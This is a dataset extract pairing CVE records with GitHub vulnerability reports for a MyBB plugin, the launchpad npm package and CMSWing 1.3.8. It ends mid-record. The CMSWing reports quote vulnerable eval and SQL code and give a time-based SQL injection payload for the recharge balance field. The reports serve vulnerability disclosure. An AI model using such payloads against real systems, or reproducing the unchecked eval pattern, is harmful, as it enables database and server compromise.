cve_id stringlengths 13 16 | cve_published stringdate 2019-01-01 16:29:00 2025-02-25 20:15:37 | cve_descriptions stringlengths 34 2.6k | cve_metrics dict | cve_references listlengths 1 281 | cve_configurations listlengths 1 70 | cve_cwe_list listlengths 1 1 | cve_primary_cwe stringclasses 164 values | url stringlengths 36 97 | cve_tags listlengths 1 5 ⌀ | domain stringclasses 1 value | issue_owner_repo listlengths 2 2 | issue_body stringlengths 0 198k ⌀ | issue_title stringlengths 1 335 | issue_comments_url stringlengths 55 116 | issue_comments_count int64 0 338 | issue_created_at stringdate 2012-06-06 09:34:24 2025-04-02 09:37:20 | issue_updated_at stringdate 2014-04-01 20:16:21 2025-06-16 12:26:58 | issue_html_url stringlengths 36 97 | issue_github_id int64 4.93M 2.97B | issue_number int64 1 199k | __index_level_0__ int64 0 6.55k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
CVE-2021-3337 | 2021-01-28T20:15:13.307 | The Hide-Thread-Content plugin through 2021-01-27 for MyBB allows remote attackers to bypass intended content-reading restrictions by clicking on reply or quote in the postbit. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/161185/MyBB-Hide-Thread-Content-1.0-Information-Disclosure.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/snlbaral/Hide-Thread-Content/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/161185/MyBB-Hide-Thread-Content-1.0-Information-Disclosure.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/snlbaral/Hide-Thread-Content/issues/1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hide_thread_content_project:hide_thread_content:1.0:*:*:*:*:mybb:*:*",
"matchCriteriaId": "A378E2BC-F30C-4F34-BD60-B26EF403A1F4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"863"
] | 863 | https://github.com/snlbaral/Hide-Thread-Content/issues/1 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"snlbaral",
"Hide-Thread-Content"
] | Hidden thread content is able to be viewed without replying by using the _reply_ or _quote_ button located in the postbit.
By clicking either two buttons you can view the thread content in the `[quote]` brackets without having to actually reply.
Example:

A solution would be to add a custom message inside the quote brackets for users who haven't replied that way thread content isn't revealed.
Example:
`[quote="admin" pid='17' dateline='1611782869']`
`Please reply to this thread to unlock the content.`
`[/quote]` | Hidden content visible without replying | https://api.github.com/repos/snlbaral/Hide-Thread-Content/issues/1/comments | 4 | 2021-01-27T22:34:32Z | 2024-10-19T18:25:08Z | https://github.com/snlbaral/Hide-Thread-Content/issues/1 | 795,497,859 | 1 | 1,670 |
CVE-2021-23330 | 2021-02-01T15:15:13.450 | All versions of package launchpad are vulnerable to Command Injection via stop. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "report@snyk.io",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "report@snyk.io",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/bitovi/launchpad/issues/123%23issuecomment-732188118"
},
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/bitovi/launchpad/pull/124"
},
{
"source": "report@snyk.io",
"tags": [
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-JS-LAUNCHPAD-1044065"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/bitovi/launchpad/issues/123%23issuecomment-732188118"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/bitovi/launchpad/pull/124"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-JS-LAUNCHPAD-1044065"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.1.0:*:*:*:*:node.js:*:*",
"matchCriteriaId": "9D41E148-9F2D-4718-A249-7FD69F0F9C5A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.2.0:*:*:*:*:node.js:*:*",
"matchCriteriaId": "1648F050-8CA9-4902-A8B6-D6E96C8082A8",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.2.1:*:*:*:*:node.js:*:*",
"matchCriteriaId": "DFED6EFE-7032-4619-A48F-AD7BA6F6B87F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.3.0:*:*:*:*:node.js:*:*",
"matchCriteriaId": "43959509-EFF6-4B9E-A615-8CD40D5D838E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.4.0:*:*:*:*:node.js:*:*",
"matchCriteriaId": "1043FA54-6DA7-4999-8CAE-6834535F669A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.4.1:*:*:*:*:node.js:*:*",
"matchCriteriaId": "233A9C39-014C-42CD-9E9C-D52CBD56AFC1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.4.2:*:*:*:*:node.js:*:*",
"matchCriteriaId": "5301F938-99A5-40CA-B092-CBB2C1F797AA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.4.3:*:*:*:*:node.js:*:*",
"matchCriteriaId": "8464C5C9-AAF7-4D4F-9BD0-20B125BCD35D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.4.4:*:*:*:*:node.js:*:*",
"matchCriteriaId": "17D47575-2BB4-4B5D-93CC-DA4E6EE73A12",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.4.5:*:*:*:*:node.js:*:*",
"matchCriteriaId": "A62F8200-D82A-4D12-B893-D3FE7B32B383",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.4.6:*:*:*:*:node.js:*:*",
"matchCriteriaId": "AE67165E-40B3-484F-8305-F82835144722",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.4.7:*:*:*:*:node.js:*:*",
"matchCriteriaId": "C649304E-1BC5-48DA-BCAA-4E76BD78C151",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.4.8:*:*:*:*:node.js:*:*",
"matchCriteriaId": "AF4D75CF-DB33-4DCB-A726-4339A58ED663",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.4.9:*:*:*:*:node.js:*:*",
"matchCriteriaId": "7151CE31-B776-4285-A252-9FA55DB1133C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.5.0:*:*:*:*:node.js:*:*",
"matchCriteriaId": "62AE1AEA-FE5A-4DA6-A178-B26A269DECBF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.5.1:*:*:*:*:node.js:*:*",
"matchCriteriaId": "D3F95C1C-2EA1-405C-A5AC-6D2E4FFA31FC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.5.2:*:*:*:*:node.js:*:*",
"matchCriteriaId": "B5979021-0EF1-48D7-B947-3C7586E8BFE3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.5.3:*:*:*:*:node.js:*:*",
"matchCriteriaId": "7239DD77-A670-4BF7-A8D8-D2CAF75E57EB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.5.4:*:*:*:*:node.js:*:*",
"matchCriteriaId": "A0F77D58-23BC-4E3E-B140-40732E09732B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.6.0:*:*:*:*:node.js:*:*",
"matchCriteriaId": "161CBCE2-A330-4E7B-83FB-CEDE15125BBD",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.7.0:*:*:*:*:node.js:*:*",
"matchCriteriaId": "218E2FA3-9339-45D0-A3FF-7B466EC3DA68",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.7.1:*:*:*:*:node.js:*:*",
"matchCriteriaId": "4F5402FC-4BA2-43F6-99ED-F8AF23C2B1BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.7.2:*:*:*:*:node.js:*:*",
"matchCriteriaId": "BB4299AF-5100-4CE1-B519-D26C5EAEBE09",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.7.3:*:*:*:*:node.js:*:*",
"matchCriteriaId": "6328BD26-3C5E-4D14-AB19-39DFF93A5B5E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.7.4:*:*:*:*:node.js:*:*",
"matchCriteriaId": "A1E894E5-5260-4815-9BC4-6A831F1B5A1A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:bitovi:launchpad:0.7.5:*:*:*:*:node.js:*:*",
"matchCriteriaId": "4CAB370C-A97F-45D7-9493-0D164CDD37FD",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"78"
] | 78 | https://github.com/bitovi/launchpad/issues/123%23issuecomment-732188118 | [
"Third Party Advisory"
] | github.com | [
"bitovi",
"launchpad"
] | This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)
# Overview
[launchpad](https://www.npmjs.com/package/launchpad) allows you to launch browsers! With NodeJS!
The issue occurs because a `user input` is formatted inside a `command` that will be executed without any check.
# Bug Bounty
We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/
We will submit a pull request directly to your repository with the fix as soon as possible. Want to learn more? Go to https://github.com/418sec/huntr 📚
_Automatically generated by @huntr-helper..._ | Security Notice & Bug Bounty - Remote Code Execution - huntr.dev | https://api.github.com/repos/bitovi/launchpad/issues/123/comments | 3 | 2020-06-19T16:59:31Z | 2022-06-21T22:08:56Z | https://github.com/bitovi/launchpad/issues/123 | 642,110,560 | 123 | 1,671 |
CVE-2020-20294 | 2021-02-01T18:15:13.060 | An issue was found in CMSWing project version 1.3.8. Because the log function does not check the log parameter, malicious parameters can execute arbitrary commands. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/arterli/CmsWing/issues/49"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/arterli/CmsWing/issues/49"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cmswing:cmswing:1.3.8:*:*:*:*:*:*:*",
"matchCriteriaId": "8F12313E-0A52-4EFB-AEAA-74EAFEF8901B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/arterli/CmsWing/issues/49 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"arterli",
"CmsWing"
] | Find a code execution vulnerability in cmswing project version 1.3.8,Details can be found in the analysis below.
The vulnerability lies in the `log` function in the `cmswing/src/mode/action.js`
```
async log(action, model, record_id, user_id, ip, url) {
// action=action||null,model=model||null,record_id=record_id||null,user_id=user_id||null;
// 参数检查
if (think.isEmpty(action) || think.isEmpty(model) || think.isEmpty(record_id)) {
return '参数不能为空';
}
if (think.isEmpty(user_id)) {
const user = await think.session('userInfo');
const id = user.id;
user_id = id;
}
// 查询行为,判断是否执行
const action_info = await this.where({name: action}).find();
if (action_info.status != 1) {
return '该行为被禁用';
}
// 插入行为日志
const data = {
action_id: action_info.id,
user_id: user_id,
action_ip: _ip2int(ip),
model: model,
record_id: record_id,
create_time: new Date().valueOf()
};
data.remark = '';
// 解析日志规则,生成日志备注;
if (!think.isEmpty(action_info.log)) {
const match = action_info.log.match(/\[(\S+?)\]/g);
if (!think.isEmpty(match)) {
const log = {
user: user_id,
record: record_id,
model: model,
time: new Date().valueOf(),
data: {
user: user_id,
record: record_id,
model: model,
time: new Date().valueOf()
}
};
const replace = [];
for (let val of match) {
val = val.replace(/(^\[)|(\]$)/g, '');
const param = val.split('|');
console.log(1111111,param);
if (!think.isEmpty(param[1])) {
if (param[0] == 'user') {
replace.push(await call_user_func(param[1], log[param[0]]));
} else {
replace.push(call_user_func(param[1], log[param[0]]));
}
} else {
replace.push(log[param[0]]);
}
}
data.remark = str_replace(match, replace, action_info.log);
// console.log(data.remark)
} else {
data.remark = action_info.log;
}
} else {
// 未定义日志规则,记录操作URL
data.remark = '操作url:' + url;
}
if (!think.isNumber(record_id)) {
data.record_id = 0;
}
await this.model('action_log').add(data);
if (!think.isEmpty(action_info.rule)) {
const rules = await this.parse_action(action, user_id);
// console.log(rules);
const res = await this.execute_action(rules, action_info.id, user_id);
}
}
......
global.call_user_func = function(cb, params) {
const func = eval(cb);
if (!think.isArray(params)) {
params = [params];
}
return func.apply(cb, params);
};
```
The variable `log` is the user behavior log data transmitted by the front end. The function log implements the processing of the variable log. If the `param[0]=='user'`, the `call_user_func` function is called. The variable is not checked. Malicious parameters will lead to the `eval` method of the call_user_fun function to implement code execution.
**Local Test**
Enter the background of the system, select user behavior,add our payload to the rules of conduct

Add an article to trigger the user behavior just now.

Execution Log, the code was successfully executed and the IP-related information was printed out

| Vulnerability Report: cmswing 1.3.8 code execution | https://api.github.com/repos/arterli/CmsWing/issues/49/comments | 1 | 2019-10-10T03:26:21Z | 2019-11-07T08:19:45Z | https://github.com/arterli/CmsWing/issues/49 | 505,009,818 | 49 | 1,672 |
CVE-2020-20295 | 2021-02-01T18:15:13.123 | An issue was found in CMSWing project version 1.3.8. Because the updateAction function does not check the detail parameter, malicious parameters can execute arbitrary SQL commands. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/arterli/CmsWing/issues/50"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/arterli/CmsWing/issues/50"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cmswing:cmswing:1.3.8:*:*:*:*:*:*:*",
"matchCriteriaId": "8F12313E-0A52-4EFB-AEAA-74EAFEF8901B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/arterli/CmsWing/issues/50 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"arterli",
"CmsWing"
] | Find a code execution vulnerability in cmswing project version 1.3.8,Details can be found in the analysis below.
**Vulnerability Location**
The vulnerability lies in the `updateAction` function in the `cmswing/src/controller/admin/action.js`
```
async updateAction() {
const data = this.post();
if (think.isEmpty(data.id)) {
data.status = 1;
data.update_time = Date.now();
const res = await this.model('action').add(data);
if (res) {
this.success({name: '新增成功!', url: '/admin/action/index'});
} else {
this.fail('添加失败!');
}
} else {
data.update_time = Date.now();
const res = await this.model('action').update(data);
if (res) {
this.success({name: '更新成功!', url: '/admin/action/index'});
} else {
this.fail('更新失败!');
}
}
}
```
The variable `data` is the user behavior data transmitted by the front end. The function `updateAction` updates the user behavior using data. Due to the lack of data checking, SQL injection exists. When the user triggers the corresponding behavior, for example, adding articles, SQL statement execution will be triggered.
**Local Test**
Enter the background of the system, select user behavior,add our payload to the rules of conduct

Add an article to trigger the user behavior just now. The SQL statement is executed successfully and the response time exceeds 5 seconds.


Database Execution Log

| Vulnerability Report: cmswing 1.3.8 updateAction sql injection | https://api.github.com/repos/arterli/CmsWing/issues/50/comments | 1 | 2019-10-10T03:56:23Z | 2019-10-10T03:58:31Z | https://github.com/arterli/CmsWing/issues/50 | 505,017,656 | 50 | 1,673 |
CVE-2020-20296 | 2021-02-01T18:15:13.203 | An issue was found in CMSWing project version 1.3.8, Because the rechargeAction function does not check the balance parameter, malicious parameters can execute arbitrary SQL commands. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/arterli/CmsWing/issues/51"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/arterli/CmsWing/issues/51"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cmswing:cmswing:1.3.8:*:*:*:*:*:*:*",
"matchCriteriaId": "8F12313E-0A52-4EFB-AEAA-74EAFEF8901B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/arterli/CmsWing/issues/51 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"arterli",
"CmsWing"
] | Find a code execution vulnerability in cmswing project version 1.3.8,Details can be found in the analysis below.
**Vulnerability Location**
The vulnerability lies in the `rechargeAction` function in the `cmswing/src/controller/admin/user.js`
```
async rechargeAction() {
if (this.isAjax('POST')) {
const data = this.post();
const self = this;
const insertId = await this.db.transaction(async() => {
await self.db.where({id: data.id}).increment('amount', data.balance);
const amount_log = await self.db.where({id: data.id}).getField('amount', true);
return await self.model('balance_log').db(self.db.db()).add({
admin_id: self.user.uid,
user_id: data.id,
type: 2,
time: new Date().valueOf(),
amount: data.balance,
amount_log: amount_log,
note: `管理员(${await get_nickname(self.user.uid)})为您充值,充值的金额为:${data.balance} 元`
});
});
if (insertId) {
return this.success({name: '充值成功!'});
} else {
return this.fail('充值失败!');
}
} else {
const id = this.get('ids');
const name = await get_nickname(id);
this.assign('name', name);
this.assign('id', id);
this.meta_title = '会员充值';
return this.display();
}
}
```
The variable `data.balance` represents the amount of recharge. The function rechargeAction increases the amount of money by the specified user, but lacks sufficient checks for `data.balance`, which results in SQL injection when database update operation is performed.
**Local Test**
Enter the background of the system, select user recharge

Modify the `balance` to `(select if(left(version(),1)=5,sleep(5),sleep(10)))`. it was found that the replenishment was successful and the response time was extended by 5 seconds, proving that our statement was successfully injected into the database for execution.

Database Execution Log

| Vulnerability Report: cmswing 1.3.8 user recharge sql injection | https://api.github.com/repos/arterli/CmsWing/issues/51/comments | 0 | 2019-10-10T04:00:45Z | 2019-10-10T04:00:45Z | https://github.com/arterli/CmsWing/issues/51 | 505,018,744 | 51 | 1,674 |
CVE-2020-21179 | 2021-02-01T18:15:13.327 | Sql injection vulnerability in koa2-blog 1.0.0 allows remote attackers to Injecting a malicious SQL statement via the name parameter to the signin page. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/wclimb/Koa2-blog/issues/40"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/wclimb/Koa2-blog/issues/40"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
